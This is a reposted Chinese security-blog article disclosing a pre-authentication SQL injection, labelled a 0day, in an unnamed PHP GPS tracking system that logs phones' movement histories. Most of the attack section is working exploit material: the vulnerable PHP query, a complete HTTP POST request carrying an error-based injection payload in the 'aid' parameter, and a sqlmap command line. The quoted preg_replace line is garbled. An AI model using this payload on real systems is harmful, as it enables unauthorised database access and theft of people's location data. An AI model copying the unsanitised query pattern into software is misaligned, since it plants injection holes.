某GPS定位系统存在前台SQL注入漏洞

admin 2025年5月27日11:13:19评论31 views字数 1837阅读6分7秒阅读模式
某GPS定位系统存在前台SQL注入漏洞

点击上方蓝字关注我们 并设为星标

0x00 前言

手机端强制打开GPS,每3分钟(可调)获取一次所在经纬度,如果位置变化距离超过100米(可调),

则提交给后台的PHP。然后后台把得到的数据保存到数据库,再通过前面的百度地图API绘制出轨迹和显示驻留时间。

安卓端安装好后,设置开机自启并打开相应的权限,手机会弹出一个ID,

拿着ID到后台地址监控页就可以随时查看手机的活动轨迹了。

某GPS定位系统存在前台SQL注入漏洞

0x01 漏洞分析&复现

位于 /userActivity.php 中通过 POST 传入 type 及 getUserLocation 参数,且未加过滤,直接带入SQL查询字句中,导致漏洞产生.

if ($type == 'getUserLocation') {
    $aid = $_POST['aid'];
    $aid = preg_replace('/|/'"','", $aid);
    $rs = mysqli_query($conn, "SELECT * FROM `user_location` WHERE  `aid` IN ('$aid')  ORDER BY id DESC LIMIT 5");
    $out = array();
while ($row = mysqli_fetch_object($rs)) {
        $out[] = $row;
    }
}
Payload:
POST /userActivity.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
Cookie: Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1731328644; _ga=GA1.1.2095806093.1731475984; Hm_lvt_22fbf4ec0601742141df7f652a137a5c=1731635709; Hm_lvt_ddf174778b49d80ad4f7dc54a908a39f=1732349704; su_webp=1; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1734361867
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

type=getUserLocation&aid=') OR (SELECT 1085 FROM(SELECT COUNT(*),CONCAT((SELECT (USER())),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('UGwc'='UGwc
某GPS定位系统存在前台SQL注入漏洞
Python sqlmap.py -r a.txt

某GPS定位系统存在前台SQL注入漏洞

0x02 源码下载

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转

GPS源码关注公众号,发送 250425 获取!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):某GPS定位系统存在前台SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月27日11:13:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某GPS定位系统存在前台SQL注入漏洞https://cn-sec.com/archives/4000195.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息